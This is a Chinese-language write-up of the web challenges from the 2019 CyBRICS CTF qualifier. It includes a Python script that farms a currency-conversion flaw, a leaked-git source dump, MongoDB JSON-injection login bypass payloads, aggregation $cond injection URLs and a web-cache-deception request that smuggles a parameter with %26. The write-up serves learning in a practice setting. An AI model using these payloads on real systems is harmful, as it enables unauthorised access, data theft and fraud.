前言
周末参加了LCBC主办的2019 CyBRICS CTF Quals,在金砖五国中,获得了top5的成绩,以下是web的题解。
Bitkoff Bank
点一次mine btc,获得0.0000000001 BTC,而购买auto-miner需要0.1 USD。
购买auto-miner后,我们的网页会多出这样一个script,每秒帮我们点击1000次,但实际上并非1秒能获得这么多BTC:
然后获取flag需要1USD,显然即便依靠auto-miner也是遥遥无期的。
通过做题的经验,给了的功能一般不会白给,我们测试一下转换功能,发现不断将BTC转成USD,将USD转成BTC,就会因为汇率问题就会不断加钱,写脚本即可:
import requests import re url = 'http://95.179.148.72:8083/index.php' cookie = { 'name':'yyplsky', 'password':'yyplskycool' } def GetUSD(): while True: try: r = requests.get(url,cookies=cookie,timeout=3) res = r.content res = re.findall(r'<b>([0-9\.]*)</b><br>',res) return res[0] except: pass def USD_to_BTC(USD): data = { 'from_currency':'usd', 'to_currency':'btc', 'amount':USD } while True: try: r = requests.post(url,data=data,cookies=cookie,timeout=3) break except: pass def GetBTC(): while True: try: r = requests.get(url,cookies=cookie,timeout=3) res = r.content res = re.findall(r'<b>([0-9\.]*)</b><br>',res) return res[1] except: pass def BTC_to_USD(BTC): data = { 'from_currency':'btc', 'to_currency':'usd', 'amount':BTC } while True: try: r = requests.post(url,data=data,cookies=cookie,timeout=3) break except: pass for i in range(200): USD = GetUSD() print USD USD_to_BTC(USD) BTC = GetBTC() print BTC BTC_to_USD(BTC)
通过来回转钱,跑差不多十分钟就够$1 USD,可以购买flag了。
Caesaref
这题本来设置的难度为hard,但因为出现了非预期,我们发出的请求可以在服务器收到,但回带上admin cookie,所以我们可以直接更改cookie进入admin页面,导致我们可以直接点击show flag获取flag。
修复版本见下面的Fixaref,这题就不再详解。
NopeSQL
扫描发现:
http://173.199.118.226/.git/HEAD
进行githacker源码泄露,拿到源码:
python GitHacker.py http://173.199.118.226/.git/
简单审视代码,发现是php为后端,mongodb作为数据库。
题目分为两部分,第一部分是需要先成功登入:
我们注意到在sql拼接处,为加任何过滤:
$raw_query = '{"username": "'.$username.'", "password": "'.$password.'"}';
题目会直接拼接我们传入的username和password。但因为后续有json_decode,所以导致我们并不能使用传统方法进行Bypass:
$document = $collection->findOne(json_decode($raw_query));
这里我们的想法本来为:
username=admin password[$ne]=1
这样即查找用户名为admin,密码不为1的用户,那么显然管理员密码不可能为1,那么可以成功匹配到管理员用户,但这里由于json_decode,我们这样直接传参不会奏效,同时也不能使用//进行注释闭合。
<?php error_reporting(1); $username='admin'; $password[$ne]='1'; $raw_query = '{"username": "'.$username.'", "password": "'.$password.'"}'; var_dump(json_decode($raw_query));
但我们可以构造出如下脚本,来生成我们想要的exp:
<?php error_reporting(1); $password = array('$ne' => '1'); $res = array('username' => 'admin', 'password' => $password); var_dump(json_encode($res));
得到:
{"username":"admin","password":{"$ne":"1"}}
所以我们的目标是构造出这样的exp,即可解析出password[$ne]=1。
那么我们在password字段注入即可:
aaa", "password": {"$ne": "test"}, "username": "admin
即:
username = admin password = aaa", "password": {"$ne": "test"}, "username": "admin
这样可以得到:
{"username": "admin", "password": "aaa", "password": {"$ne": "test"}, "username": "admin"}
这样一来,我们即可搜索到满足条件的管理员用户:
"password": {"$ne": "test"}, "username": "admin"
登入后,来到第二个挑战:
通过查询资料得知,在mongodb的aggregate中,可以使用$cond进行条件语句:
单个条件可以为:
[$cond][if][$eq]
如果要使用两个条件,则并列即可:
[$cond][if][$eq] [$cond][if][$eq]
那么我们可以利用:
if then else
比如当我们匹配到flags时候,就将其移除:
http://173.199.118.226/index.php?filter[$cond][if][$eq][]=flags&filter[$cond][if][$eq][]=$category&filter[$cond][then]=$$REMOVE&filter[$cond][else]=$category
发现flags被移除:
在匹配到public时,将其移除:
http://173.199.118.226/index.php?filter[$cond][if][$eq][]=public&filter[$cond][if][$eq][]=$category&filter[$cond][then]=$$REMOVE&filter[$cond][else]=$category
发现此时正常:
那么利用条件语句,发现flags时,就输出其title:
http://173.199.118.226/index.php?filter[$cond][if][$eq][]=flags&filter[$cond][if][$eq][]=$category&filter[$cond][then]=$title&filter[$cond][else]=$category
从title中我们得知有text,那么读取:
http://173.199.118.226/index.php?filter[$cond][if][$eq][]=flags&filter[$cond][if][$eq][]=$category&filter[$cond][then]=$text&filter[$cond][else]=$category
即可拿到flag:
cybrics{7|-|15 15 4 7E><7 |=|_49}
Fixaref
进入页面后,发现可以ask question,本能测试一下远程请求:
收到后,发现是python requests发包,同时注意到http header:
发现了一个奇怪的header,搜索得知,可能和缓存有关,同时依据之前非预期的题目的flag提示:cache is vulnerabilities。那么判定本题应该是利用cache的问题。
我们测试让题目自己去访问:
http://95.179.190.31/index.php/skyiscool.js
发现可以管理员的页面:
那么本能想要拿出flag,测试让题目去请求:
http://95.179.190.31/index.php/skyiscool.js?csrf-token=b04d2bc2f3d3654947ba82d59a2b367630743d3447dbc0af46182359f166c4bd&flag=1
但发现我们的flag参数被丢弃:
为了探测他的过滤规则,那么构造如下请求:
http://1.1.1.1/?a=1&b=2
发现b参数被丢弃:
那么初步判断校验标准应该是只允许传入1个参数,那么思考如何判断参数个数?
这里猜测可能是利用&,那么我们尝试把&编码:
http://1.1.1.1/?a=1%26b=2
发现成功:
那么使用如下exp,让题目请求:
http://95.179.190.31/index.php/skyiscool.js?csrf-token=b04d2bc2f3d3654947ba82d59a2b367630743d3447dbc0af46182359f166c4bd%26flag=1
发现此时已经带有flag参数:
访问cache页面,拿到flag:
cybrics{Bu9s_C4N_83_uN1N73Nd3D!}
后记
这次2019 CyBRICS CTF Quals的Web方向题目并不困难,相比WCTF LCBC的Web题,还是后者更有趣XD~